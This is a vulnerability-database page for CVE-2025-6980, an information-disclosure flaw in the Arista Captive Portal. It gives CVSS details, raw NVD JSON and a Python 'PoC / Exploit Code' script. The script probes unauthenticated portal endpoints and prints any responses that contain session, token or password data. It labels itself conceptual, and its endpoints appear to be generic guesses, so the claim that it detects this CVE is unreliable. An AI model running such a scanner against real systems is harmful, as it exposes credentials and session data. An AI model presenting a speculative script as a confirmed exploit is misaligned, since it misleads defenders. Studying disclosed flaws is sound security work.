Security Vulnerability Report
中文
CVE-2025-6980 CVSS 7.5 HIGH

CVE-2025-6980

Published: 2025-10-23 19:15:52
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Captive Portal can expose sensitive information

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Arista EOS Captive Portal (具体版本需参考官方安全公告)
Arista Wireless产品线启用Captive Portal的版本
Arista交换机产品启用Captive Portal的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-6980 PoC - Arista Captive Portal Information Disclosure # This is a conceptual PoC demonstrating the attack vector # Use only for authorized security testing import requests import sys def check_vulnerability(target_url): """Check if target is vulnerable to CVE-2025-6980""" # Common Captive Portal endpoints endpoints = [ "/captive-portal/api/user/status", "/captive-portal/api/session/info", "/api/captive-portal/user", "/captiveportal/userinfo", "/hotspot/login" ] vulnerable = False leaked_data = [] for endpoint in endpoints: try: # Attempt to access sensitive endpoint without authentication url = target_url.rstrip('/') + endpoint response = requests.get(url, timeout=10, verify=False) # Check for sensitive information in response if response.status_code == 200: # Look for indicators of sensitive data exposure sensitive_keywords = [ 'session', 'token', 'secret', 'password', 'key', 'credential', 'auth', 'user_data' ] response_text = response.text.lower() for keyword in sensitive_keywords: if keyword in response_text: vulnerable = True leaked_data.append({ 'endpoint': endpoint, 'status_code': response.status_code, 'data_preview': response.text[:500] }) break except requests.exceptions.RequestException as e: print(f"[-] Error accessing {endpoint}: {e}") return vulnerable, leaked_data if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-6980-poc.py <target_url>") print("Example: python cve-2025-6980-poc.py https://192.168.1.1") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] Checking for CVE-2025-6980 vulnerability...\n") is_vulnerable, data = check_vulnerability(target) if is_vulnerable: print("[!] Target is VULNERABLE to CVE-2025-6980") print(f"[!] Found {len(data)} potentially vulnerable endpoints") for item in data: print(f"\n[+] Endpoint: {item['endpoint']}") print(f" Status: {item['status_code']}") print(f" Data Preview: {item['data_preview']}...") else: print("[-] Target appears to be NOT vulnerable") print("\n[*] Note: This PoC is for authorized testing only")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6980", "sourceIdentifier": "[email protected]", "published": "2025-10-23T19:15:51.667", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Captive Portal can expose sensitive information"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "https://https://www.arista.com/en/support/advisories-notices/security-advisory/22535-security-advisory-0123", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.